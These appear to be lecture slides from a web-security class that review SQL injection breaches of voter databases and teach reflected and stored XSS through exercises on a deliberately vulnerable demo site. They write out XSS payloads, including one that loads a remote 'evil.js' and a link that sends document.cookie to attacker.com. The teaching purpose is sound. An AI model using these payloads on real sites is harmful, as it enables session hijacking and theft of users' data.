1/21

Agenda

I SQL injection reviewI XSS attacks

2/21

Excerpt from the Debate - Closely relevant to this class

I "Mine were words, and his was action."I "You would be in jail."I "When they go low, we go high."I "She doesn’t do anything about anything other than talk. It’s

all talk, no action."

3/21

SQL Injection Review - the Arizona Voter Database HackIncident

Read this new:http://www.azfamily.com/story/32945105/hack-that-targeted-arizona-voter-database-was-easy-to-prevent-expert-says

or watch the video:https://www.youtube.com/watch?v=05mHxMYbdj8

4/21

What can we learn from this news?

I SQL injection attack is prevalent in real world.I SQL injection attack is easy to perform.I Limit what users can type into an input field is a

countermeasure against SQL injection attack.I Everyone after taking this class, can be the director of

strategic research initiativies at Arizona State University’sGlobal Security Initiative.

5/21

the Illinois Voter Registration System (IVRS) SecurityBreach Incident

Read this:https://www.facebook.com/permalink.php?story_fbid=1144387868951159&id=215366205186668Do you agree with this memo when it says "This was a highlysophisicated attack"?

6/21

SQL Injection Hall of Shame

Go to here and see how popular SQL injection is in 2016.http://codecurmudgeon.com/wp/sql-injection-hall-of-shame/

7/21

Cross Site Scripting (XSS)

I A security bug that can affect websites.I If present in your website, this bug can allow an attacker to

add their own malicious JavaScript code onto the HTMLpages displayed to your users.

I Once executed by the victim’s browser, this code could thenperform actions such as completely changing the behavior orappearance of the website, stealing private data, or performingactions on behalf of the user.

8/21

Prerequisite

I HTMLI JavaScriptI Document Object Model (DOM)I A background in these will be helpful for understanding the

technical details.

9/21

Types

I Non-persistent (reflected): Occurs when the data provided bya web client, most commonly in HTTP query parameters (e.g.HTML form submission), is used immediately by server-sidescripts to parse and display a page of results for and to thatuser, without properly sanitizing the request.

I Persistent (stored): Occurs when the data provided by theattacker is saved by the server, and then permanentlydisplayed on "normal" pages returned to other users in thecourse of regular browsing, without proper HTML escaping.

10/21

Non-persistent

I e.g., A non-persistent XSS vulnerability in Google could allowmalicious sites to attack Google users who visit them whilelogged in.

11/21

Persistent

I A dating website where members scan the profiles of othermembers to see if they look interesting. For privacy reasons,this site hides everybody’s email. The only time a member’semail is in the browser is when the member is signed in, andthey can’t see anyone else’s.

I Mallory, an attacker, joins the site and wants to figure out theemail addresses of the people on the site. To do so, she writesa script designed to run from other people’s browsers whenthey visit her profile. The script then sends a quick message toher own server, which collects this information.

12/21

Persistent - Cont’d

I For the question "Describe your Ideal First Date", Mallorygives a short answer (to appear normal) but the text at theend of her answer is her script to steal names and emails. Ifthe script is enclosed inside a <script> element, it won’t beshown on the screen.

I Bob, a member of the dating site, reaches Mallory’s profile,which has her answer to the First Date question. Her script isrun automatically by the browser and steals a copy of Bob’semail directly from his own machine.

13/21

Hands-on Project - Session 1.1 - Non persistent XSS attack

I Go to https://xss-doc.appspot.com/demo/2.I Search for test.I Search for <u>test</u>. Notice that "test" is underlined in

the response.I You can see that your HTML markup is included in the

response. Interesting, but not terribly dangerous.

14/21

Hands-on Project - Session 1.2 - Non persistent XSS attack

I Search for <script>alert(’hello’)</script>.I Note: If you copy-paste this into the input box, make sure you

manually type in the single quotes.I Problem?

I User input is not escaped before the search results page isrendered.

I This is a "reflected" XSS attack, where the JavaScript payload(<script>alert(’hello’)</script>) is echoed back onthe page returned by the server to the victim right away.

14/21

Hands-on Project - Session 1.2 - Non persistent XSS attack

I Search for <script>alert(’hello’)</script>.I Note: If you copy-paste this into the input box, make sure you

manually type in the single quotes.I Problem?

I User input is not escaped before the search results page isrendered.

I This is a "reflected" XSS attack, where the JavaScript payload(<script>alert(’hello’)</script>) is echoed back onthe page returned by the server to the victim right away.

15/21

Hands-on Project - Session 2.1

I Go to https://xss-doc.appspot.com/demo/1I Enter <img src=x onerror="alert(’Pop-up window via

stored XSS’);"I Click "Share status". What do you see?I Refresh the page or share another random status message

(e.g., type "hello world!" in the message box and sharestatus.). What do you see?

I Now enter <img src=xonerror="alert(document.cookie);" and hit "Sharestatus!" What do you see?

I Imagine this vulnerability exists on www.facebook.com, byexploiting this vulnerability, what bad things attackers can do?

16/21

Hands-on Project - Session 2.2

I Try enter the following:<img src=1onerror="s=document.createElement(‘script’);s.src=‘//xss-doc.appspot.com/static/evil.js’;document.body.appendChild(s);"

I In this example, an evil JavaScript file was retrieved andembedded via XSS.

I The server stores the attacker-supplied input (the XSSpayload) and serve it to the victim at a later time. A "storedXSS" or persistent XSS attack.

16/21

Hands-on Project - Session 2.2

I Try enter the following:<img src=1onerror="s=document.createElement(‘script’);s.src=‘//xss-doc.appspot.com/static/evil.js’;document.body.appendChild(s);"

I In this example, an evil JavaScript file was retrieved andembedded via XSS.

I The server stores the attacker-supplied input (the XSSpayload) and serve it to the victim at a later time. A "storedXSS" or persistent XSS attack.

17/21

References

A large portion of the material is adapted from:I Cross site scripting wikipedia page-

https://en.wikipedia.org/wiki/Cross-site_scriptingI Google application security cross-site scripting, https:

//www.google.com/about/appsecurity/learning/xss/I HTTP cookie on wikipedia -

https://en.wikipedia.org/wiki/HTTP_cookie

18/21

Backup Slides

19/21

A Real World Story to Read

Serious Cross Site Scripting Vulnerability in TweetDeck – Twitterhttps://blog.sucuri.net/2014/06/serious-cross-site-scripting-vulnerability-in-tweetdeck-twitter.html

Twitter shuts down Tweetdeck after XSS flaw leaves usersvulnerable to account hijackhttps://www.theguardian.com/technology/2014/jun/11/twitter-tweetdeck-xss-flaw-users-vulnerable

20/21

HTTP Cookie

I Also called web cookie, Internet cookie, browser cookie.I A small piece of data sent from a website and stored in the

users’ web browser while the user is browsing.I Typically, used by web servers to know whether the user is

logged in or not, and which account they are logged in withI Session cookie - only in temporary memory while the user

navigates the website. Web browsers normally delete sessioncookies when the user closes the browser.

21/21

Cookie Theft

I Cookies should be only exchanged between a server and aclient.

I Cookie theft: when a cookie is sent to another party.I e.g., an attacker may post a message on www.example.com

with the following link:<a href="#" onclick="window.location =’http://attacker.com/stole.cgi?text=’ +escape(document.cookie); return false;">Clickhere!</a>

I See https://en.wikipedia.org/wiki/HTTP_cookie#Session_cookiefor more details.